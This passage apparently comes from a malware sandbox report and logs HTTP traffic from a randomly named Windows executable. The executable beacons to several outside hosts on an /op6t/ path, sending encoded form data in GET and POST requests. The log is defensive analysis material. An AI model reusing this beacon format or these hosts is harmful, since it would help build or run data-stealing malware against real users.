                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 37 49 57 37 68 47 50 59 5a 6a 66 62 53 49 45 44 79 76 63 75 67 6e 74 34 68 31 6a 77 6c 50 44 4a 41 6a 57 57 63 63 6e 6d 4c 36 57 44 79 61 6f 69 44 70 6b 59 77 57 7a 72 70 62 77 75 77 66 78 52 66 55 65 34 42 6d 7a 56 4f 73 75 72 2b 74 63 2f 65 43 50 64 4d 61 62 6e 63 56 59 34 74 49 35 69 46 34 36 68 4b 4c 32 73 31 4f 2f 49 4d 35 46 44 57 4b 57 48 6f 48 79 42 6e 36 78 65 2f 65 4b 38 57 2f 68 6e 6a 6a 2b 78 70 58 57 4b 4a 35 4a 53 73 58 75 74 70 41 78 35 67 44 6f 33 50 69 69 72 37 2b 47 48 71 2b 70 78 53 64 70 53 31 63 69 42 76 37 6a 51 5a 75 76 30 6b 2b 64 2b 36 2b 51 4d 4e 39 44 42 6e 4d 4c 70 53 52 50 71 53 76 35 36 52 6d 79 54 5a 47 57 4e 53 35 66 46 37 41 65 49 57 2b 57 65 69 34 38 63 42 63 58 59 35 66 4d 62 77 36 2f 74 74 31 54 61 74 6f 6e 78 7a 37 4a 67 41 54 61 43 38 4c 61 72 59 50 6d 74 45 62 51 5a 30 44 6b 47 37 4d 66 79 74 59 69 54 61 73 49 4a 45 46 71 69 71 53 74 6e 66 68 31 66 4e 50 76 47 58 78 66 74 42 66 53 4c 4f 76 68 45 4e 39 68 50 49 70 31 63 6d 6a 75 45 51 39 49 56 [TRUNCATED]
                                                                        Data Ascii: nvddg=7IW7hGPYZjfbSIEDyvcugnt4h1jwlPDJAjWWccnmL6WDyaoiDpkYwWzrpbwuwfxRfUe4BmzVOsur+tc/eCPdMabncVY4tI5iF46hKL2s1O/IM5FDWKWHoHyBn6xe/eK8W/hnjj+xpXWKJ5JSsXutpAx5gDo3Piir7+GHq+pxSdpS1ciBv7jQZuv0k+d+6+QMN9DBnMLpSRPqSv56RmyTZGWNS5fF7AeIW+Wei48cBcXY5fMbw6/tt1Tatonxz7JgATaC8LarYPmtEbQZ0DkG7MfytYiTasIJEFqiqStnfh1fNPvGXxftBfSLOvhEN9hPIp1cmjuEQ9IV+cP7RiDYAIOQ0Lb7EyjMAofaZ+b6dbSj3D3G1scTS00aQw9YkzgrdRr/feWHcpBw0erlmkGMTdGEEswstzRJmvFhC22Rxmp8Tzg6O7jglpSyxDURUrI+XZkS8cozLmEUcSNsvC9XiN3TqnZZl47j+1UD4cHF3H6///dD8c62gAImCAqFbLGVhoP9hHELBQB7iyIfAP+WPfFNrRbI7JBKF7ohV69xkAXnW4YOlfEz5x/lgUPxvGe26SUsyfYkHpPxutmW0jPh2SwuGroE3TNwOjIoyT2lPjoVv0WNCCht9Cp8vBh2RshVHIkc5jhWXtinVrkDQwvSTTBh0h0IvZYWKTLIitUyN9Q87Uo5u0buJorNHk97/JwydPnV4CjphI6EsDOvzyqxz1Df8YSFkzF9Av4veXdSBnPAdqq6atD9qlJIIjHeSOBHL1qB2UXrjiInH4lYdDkDIKus3teAhUgKGr8G0Jz2ZWjC2y+thaDHY/MXk42kCjNJzU0Zwd2Xv6JjxzXQ1/Mh91rMSfSS6rXFFchL3WRQFgifwAGQrRS9KJ7kngnHymS/8j/E0qRWOPvuSi0qcKR00jSUc5piKMRdPW9SrGDzixy5X5Kq2TENKLAFjkD+TuYdUFOpMj90ldX7+nTSHAIchjxTu3Bubdu9wxHZ06rdiE2nCR [TRUNCATED]
                                                                        May 22, 2024 17:33:48.568685055 CEST479INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:48 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.11.3049824185.76.64.170807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:51.093523979 CEST481OUTGET /op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.curty.se
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:51.445266962 CEST479INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:51 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.11.304982514.225.238.195807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:05.630665064 CEST759OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 56 65 46 33 6a 47 36 45 72 53 46 46 74 2b 6d 5a 79 43 74 6f 5a 54 5a 4a 4a 76 76 52 4c 4a 4e 2b 75 49 30 4a 61 59 59 34 47 51 6b 77 55 64 4b 5a 78 79 5a 51 38 38 2b 6c 34 4d 4e 35 67 47 61 79 68 57 57 70 31 6e 56 64 54 78 64 64 6b 69 4a 55 59 61 6c 37 79 6c 39 56 6a 4b 67 4a 78 43 67 4f 5a 32 69 4d 32 42 6d 37 65 32 47 47 79 44 6e 72 46 4b 70 41 72 54 46 70 52 49 33 54 5a 44 62 70 77 30 77 72 79 2b 42 67 4b 4a 58 55 65 61 58 6e 45 70 2f 75 5a 6f 67 39 65 6a 54 71 33 56 57 70 51 4d 33 67 33 42 6e 5a 56 62 43 55 56 6a 73 66 62 59 45 69 46 33 73 6b 42 58 4b 6d 78 69 2b 57 65 51 3d 3d
                                                                        Data Ascii: nvddg=VeF3jG6ErSFFt+mZyCtoZTZJJvvRLJN+uI0JaYY4GQkwUdKZxyZQ88+l4MN5gGayhWWp1nVdTxddkiJUYal7yl9VjKgJxCgOZ2iM2Bm7e2GGyDnrFKpArTFpRI3TZDbpw0wry+BgKJXUeaXnEp/uZog9ejTq3VWpQM3g3BnZVbCUVjsfbYEiF3skBXKmxi+WeQ==
                                                                        May 22, 2024 17:34:06.137474060 CEST420INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:58 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00
                                                                        Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.11.304982614.225.238.195807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:08.664446115 CEST779OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 56 65 46 33 6a 47 36 45 72 53 46 46 76 65 32 5a 30 6c 35 6f 52 54 5a 49 46 50 76 52 53 5a 4d 33 75 49 49 4a 61 5a 74 2f 42 6a 51 77 55 34 75 5a 77 77 68 51 39 38 2b 6c 77 73 4e 67 39 57 62 77 68 57 4b 66 31 6a 56 64 54 77 35 64 6b 67 42 55 59 70 39 30 78 56 39 62 75 71 67 4c 2f 69 67 4f 5a 32 69 4d 32 42 6a 63 65 32 65 47 79 7a 58 72 4b 49 52 44 6a 7a 46 6d 57 49 33 54 54 6a 62 74 77 30 77 4a 79 38 31 4b 4b 4c 76 55 65 66 7a 6e 45 34 2f 74 43 34 67 37 61 6a 53 47 35 56 65 6c 4a 64 6e 77 77 78 2f 2b 53 4b 53 59 51 30 64 46 47 62 77 67 57 58 51 4a 64 57 6e 4f 7a 67 2f 4e 44 54 43 6a 75 53 71 50 48 48 36 78 6f 4e 74 55 61 34 4b 47 38 69 67 3d
                                                                        Data Ascii: nvddg=VeF3jG6ErSFFve2Z0l5oRTZIFPvRSZM3uIIJaZt/BjQwU4uZwwhQ98+lwsNg9WbwhWKf1jVdTw5dkgBUYp90xV9buqgL/igOZ2iM2Bjce2eGyzXrKIRDjzFmWI3TTjbtw0wJy81KKLvUefznE4/tC4g7ajSG5VelJdnwwx/+SKSYQ0dFGbwgWXQJdWnOzg/NDTCjuSqPHH6xoNtUa4KG8ig=
                                                                        May 22, 2024 17:34:09.170407057 CEST420INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00
                                                                        Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.11.304982714.225.238.195807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:11.685544014 CEST1696OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.beersekes.com
                                                                        Origin: http://www.beersekes.com
                                                                        Referer: http://www.beersekes.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 56 65 46 33 6a 47 36 45 72 53 46 46 76 65 32 5a 30 6c 35 6f 52 54 5a 49 46 50 76 52 53 5a 4d 33 75 49 49 4a 61 5a 74 2f 42 69 6f 77 55 75 79 5a 78 52 68 51 73 4d 2b 6c 2b 4d 4e 39 39 57 61 6f 68 57 53 44 31 69 70 6e 54 79 78 64 2b 44 5a 55 63 6f 39 30 6d 6c 39 62 6e 4b 67 4f 78 43 68 55 5a 32 79 51 32 42 54 63 65 32 65 47 79 78 66 72 44 36 70 44 68 7a 46 70 52 49 33 50 5a 44 61 34 77 30 6f 7a 79 38 78 77 4b 36 50 55 65 2f 6a 6e 46 4b 58 74 4f 34 67 35 64 6a 53 65 35 56 44 37 4a 64 37 4b 77 78 37 41 53 49 43 59 52 69 45 6d 56 35 68 33 49 56 49 42 55 30 54 69 30 42 62 7a 41 55 4b 58 6d 52 6d 79 45 57 57 39 6c 49 5a 73 41 59 36 77 39 6d 44 51 50 71 52 44 67 39 32 4c 55 70 74 77 35 48 4f 2b 6c 55 46 62 48 47 43 7a 67 65 51 64 39 4c 56 59 45 4e 65 38 74 34 50 55 5a 42 43 57 31 4d 45 47 41 2b 76 79 62 45 62 4a 4b 4e 70 58 66 71 52 49 36 70 4f 49 33 70 44 2b 5a 77 79 30 70 61 51 2f 6d 67 45 72 36 2f 62 57 37 63 69 64 34 6f 75 51 77 67 41 70 66 52 4d 64 65 45 55 6d 6a 69 68 2f 59 2f 59 6d [TRUNCATED]
                                                                        Data Ascii: nvddg=VeF3jG6ErSFFve2Z0l5oRTZIFPvRSZM3uIIJaZt/BiowUuyZxRhQsM+l+MN99WaohWSD1ipnTyxd+DZUco90ml9bnKgOxChUZ2yQ2BTce2eGyxfrD6pDhzFpRI3PZDa4w0ozy8xwK6PUe/jnFKXtO4g5djSe5VD7Jd7Kwx7ASICYRiEmV5h3IVIBU0Ti0BbzAUKXmRmyEWW9lIZsAY6w9mDQPqRDg92LUptw5HO+lUFbHGCzgeQd9LVYENe8t4PUZBCW1MEGA+vybEbJKNpXfqRI6pOI3pD+Zwy0paQ/mgEr6/bW7cid4ouQwgApfRMdeEUmjih/Y/YmdXmoSHwt4vVGE7YuddQSabyxKTGljoeWE0atl3vi3XR9G9mu7m88niBZ9S/+BIjZyh+FW8e+msuArxsJO7uQfdg3Q49UqzPAvn+IjzzdNMHGMJEgdoylEeIoDvS8UFehJCuPPos2KP6gDNljmJd9QX0E6P6mxJk0ZfKgsLWYVi4X2BTY9KhNaVeomntKvJTMyi2p8UeS7xPLR2iMa3yV6nTDsuTlLxcyo7LvsjPfTQ28j1twCGBbZsDi1b8WrLLMJYnCL6oN/kz0SlTPgE0Z4qv1zASEcuO2qy2oFbLHBx5cwEjeMkKpaDKc0mJ3CTSlpIsul4Qcp6BoGZ6F6W7jkGgaF4zIKJ416pEvessWiv0riCmak9bKBJWVGf5lJbbzf7oCv7Ye7o8rhmIs8oU3X4oeKcRq/kUrS9tobN23VbMhb5nrAJL/X5DqECoQsHDU2Hb4oyGQiFrUrP7CT2XlEv0ID+GvkGEdhSuYZhlcPTxkNVgVvZE2Z0ClYKvFlnzPv93z8TvqPAPUglU5O88wy3FH+pwSdCyrg/q2ADGah25PzkYj+X16lXlQ76oRJ7msb3jiO+iJLHS3MRAbadEXikVErT8EBrH6jhrgWfmFxWb+Sv6N7kkIr6z4nopiidbyg5RH1NeRvLVip8X22CBWN6Bbkfv01G/3wv [TRUNCATED]
                                                                        May 22, 2024 17:34:12.180838108 CEST420INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 197
                                                                        Connection: close
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00
                                                                        Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.11.304982814.225.238.195807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:14.708139896 CEST486OUTGET /op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.beersekes.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:15.209423065 CEST854INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:07 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Accept-Ranges: bytes
                                                                        Vary: Accept-Encoding,User-Agent
                                                                        Data Raw: 32 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 70 36 74 2f 3f 78 32 3d 77 4e 32 78 59 26 61 6d 70 3b 6e 76 64 64 67 3d 59 63 74 58 67 77 53 63 33 42 46 48 33 36 79 46 39 79 73 33 64 6b 67 63 4e 4d 7a 4f 44 64 4d 41 67 35 55 72 4b 34 68 6f 4f 43 74 6b 55 38 65 75 36 6a 4a 74 67 4b 53 2b 37 39 56 6f 6f 6b 58 32 36 6b 62 71 37 6a 42 37 62 78 31 74 36 69 63 54 53 76 4e 48 68 6d 39 61 75 4b 39 4f 33 52 46 54 59 6c 4b 31 39 57 4f 36 50 52 36 56 31 52 50 76 4b 70 31 75 6c 6e 34 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e [TRUNCATED]
                                                                        Data Ascii: 26a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /op6t/?x2=wN2xY&amp;nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= was not found on this server.<HR><I>www.beersekes.com</I></BODY></HTML>
                                                                        May 22, 2024 17:34:15.209541082 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.11.304982991.195.240.123807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:31.825253010 CEST481OUTGET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.l7aeh.us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:32.149307013 CEST208INHTTP/1.1 403 Forbidden
                                                                        content-length: 93
                                                                        cache-control: no-cache
                                                                        content-type: text/html
                                                                        connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.11.3049830139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:37.539385080 CEST771OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
